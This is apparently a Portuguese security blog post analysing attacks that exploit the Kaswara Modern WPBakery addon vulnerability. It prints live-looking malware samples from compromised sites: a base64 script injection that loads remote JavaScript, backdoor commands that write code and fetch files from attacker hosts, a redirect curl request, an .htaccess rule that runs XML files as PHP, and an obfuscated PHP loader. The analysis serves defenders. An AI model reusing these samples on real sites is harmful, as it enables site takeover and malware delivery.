Vulnerável plug-in Kaswara Modern WPBakery Page Builder Addons sendo explorado na natureza

Em 20 de abril de 2021, nossos amigos do WPScan relataram uma vulnerabilidade grave no Kaswara Modern VC Addons, também conhecido como Kaswara Modern WPBakery Page Builder Addons. Ele não está mais disponível no Codecanyon/Envato, o que significa que se você estiver rodando, você deve escolher uma alternativa.

Esta vulnerabilidade permite que usuários não autenticados carreguem arquivos arbitrários para o diretório de ícones do plugin (./wp-content/uploads/kaswara/icons). Este é o primeiro Indicator Of Compromise (IOC) que nossos amigos do WPScan compartilharam conosco em seu relatório.

A capacidade de fazer upload de arquivos arbitrários para um site dá ao agente mal-intencionado controle total sobre o site, o que dificulta a definição da carga útil final dessa infecção; assim, mostraremos tudo o que encontramos até agora (nos empolgamos um pouco com a pesquisa, então sinta-se à vontade para pular para a seção do COI se não quiser ler).

Injeção de banco de dados, aplicativos Android falsos e outros backdoors

Obrigado ao nosso amigo Denis Sinegubko da Sucuri por apontar o acompanhamento de injeção de banco de dados usado com este ataque.

Os maus atores atualizariam a opção 'kaswara-customJS' para adicionar um trecho malicioso arbitrário de código Javascript. Aqui está um exemplo que encontramos:

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

Essa string codificada em base64 se traduz em:

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

E, como geralmente acontece com esse tipo de script, ele carregará em cadeia uma série de outros trechos de código Javascript, e a carga final será um malvertising ou um kit de exploração. Isso é muito semelhante ao que o Wordfence relatou aqui.

Nesse caso, o script está morrendo em hxxp://double-clickd[.]com/ e não está carregando nenhum conteúdo ruim. Encontrei Javascript suspeito chamando este site desde o início de 2020 e as pessoas já o bloqueiam desde 2018.

Aplicativos falsos carregados no site

Os 40 aplicativos Android encontrados nos sites que examinamos eram versões falsas de aplicativos diferentes, como AliPay, PayPal, Correos, DHL e muitos outros, que felizmente estavam sendo detectados pelos fornecedores de antivírus mais populares de acordo com esta análise do VirusTotal.

Não verifiquei as intenções do aplicativo, mas uma rápida revisão sobre as permissões solicitadas pode nos dar um vislumbre do que ele poderia fazer:

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.INTERNET
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

Esses arquivos não estão sendo carregados imediatamente usando o exploit Kaswara. Depois que o site for comprometido, os invasores carregarão outras ferramentas primeiro para controlar totalmente o site.

Arquivos enviados

Alguns backdoors e outros malwares também foram encontrados em sites comprometidos por essa vulnerabilidade. Vou compartilhar uma análise rápida dos mais populares e interessantes neste post. No entanto, quero primeiro focar no mais complexo.

Redirecionar e aplicativos falsos

Os aplicativos falsos que encontrei em vários sites comprometidos não foram carregados explorando a vulnerabilidade Kaswara. Eles estão sendo carregados no site usando uma ferramenta de hacking multifuncional, que permite que o invasor carregue algum código remoto (fornecendo uma URL ou string) e redirecione o usuário para um site malicioso.

O arquivo pode ser facilmente identificado pela presença desta string: base64_decode('MTIz');error_reporting(0); função

Curiosamente, ele randomiza todo o resto, menos isso.

O malware está em uma única linha, o que também é um IOC interessante se você estiver procurando por esse tipo de anomalia de código.

Para facilitar a compreensão, decodifiquei a maior parte do código, renomeei as funções interessantes e embelezei o código. O malware inclui 6 funções diferentes, e 5 delas são baseadas nos valores passados ​​na variável $_GET['ts'] . Para este documento, vamos considerar uma das muitas instâncias que encontrei: c.php .

/c.php?ts=kt

Isso não faz nada e forçará o site a retornar um erro 500 (mais tarde no código).

/c.php?ts=1

Altera o valor do sinalizador $q1a para true para realizar uma validação de código e enviar uma mensagem OK para o invasor.

Nesse caso, o site remoto responde: {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v=”Código”&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

Grava um arquivo no servidor com código fornecido pelo conteúdo de $_GET["v"] contanto que $_GET["p"] seja a soma de verificação SHA1 de 123 (lembre-se do primeiro IOC de base64_decode('MTIz') ? this é essa soma de verificação).

/c.php?ts=tt

Grava 5 MB de “-” no servidor, provavelmente usado para testar se a função de upload funcionará no servidor.

/c.php?ts=dwm&h=HASH1,HASH2

Quando o malware recebe essa solicitação, ele realiza um teste para verificar se os arquivos carregados foram gravados com sucesso no servidor. Seus hashes MD5 devem ser conhecidos e são enviados para a variável $_GET['h'] como valores separados por vírgula.

/c.php?ts=dw&h=hash&l=URLs_as_CSV

Faz o download de um arquivo de uma série de sites de terceiros e o salva no servidor com o nome dos últimos 12 caracteres do md5 do arquivo baixado.

Esta é a função que está sendo usada para fazer upload de aplicativos falsos para o servidor.

Aqui está um exemplo da solicitação para baixar arquivos maliciosos /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

Redirecionando o acesso

Se a opção kt ou nenhuma opção foi selecionada, o código prossegue para o redirecionamento, que é obtido solicitando um blob JSON com os dados necessários. Em seguida, ele redireciona o visitante usando a função de cabeçalho.

A resposta é assim: {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

A função para executar uma requisição cURL com os parâmetros necessários é esta: Nada extravagante…

E pode ser traduzido para esta solicitação cURL:

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

A URL final é, até onde pude testar, aleatória, mas compartilhando a mesma característica de ser uma página falsa para um serviço ou aplicativo popular.

wp-content/uploads/kaswara/icons/16/javas.xml e wp-content/uploads/kaswara/icons/16/.htaccess

Um arquivo XML geralmente não é marcado como uma ameaça potencial, mas neste caso, temos um arquivo .htaccess especialmente criado que altera a forma como o servidor da web o vê:

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

Na verdade, ele diz ao Apache para entender qualquer arquivo javas, homes ou menus com xml, php ou pdf como um arquivo PHP a ser processado e executado de acordo. Portanto, qualquer um desses arquivos presentes na mesma estrutura de diretórios que este .htaccess será suspeito.

O arquivo javas.xml é o mesmo que alguns outros arquivos maliciosos carregados no site. Descobri que a diferença é que alguns têm uma ou duas linhas em branco no final do arquivo, o que torna o hash tradicional um pouco mais complicado.

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

O código malicioso é ofuscado usando strings codificadas str_rot13 e base64. Ele também usa valores hexadecimais e operações matemáticas para ocultar um pouco mais as strings. A carga útil final é desconhecida, pois criará uma função com base nos valores de uma solicitação POST. No entanto, a carga útil parece ser a mesma todas as vezes, pois depende de uma verificação md5 antes de criá-la (c42ea979ed982c02632430e9e98a66d6 é o hash md5).

Conclusão

Como esta é uma campanha ativa, no momento em que escrevemos este post, encontramos cada vez mais exemplos de malware diferentes sendo descartados nos sites afetados. Alguns são apenas variações do que temos aqui, enquanto outros são interessantes o suficiente para uma análise mais profunda. Procure alguns posts menores em breve para explorar alguns desses outros exemplos.

Isso ilustra a importância de ter suas extensões atualizadas com as correções de segurança mais recentes; se os desenvolvedores não lançarem correções em tempo hábil ou se ele for removido do repositório WordPress.org (ou outros mercados), recomendamos que você encontre uma alternativa mais segura para ele.

Se você estiver preocupado com malware e vulnerabilidade em seu site, confira os recursos de segurança do Jetpack. O Jetpack Security oferece segurança abrangente e fácil de usar para sites WordPress, incluindo backups, verificação de malware e proteção contra spam.

Indicadores de Compromisso

Aqui você encontra a lista completa de todos os IOCs que identificamos: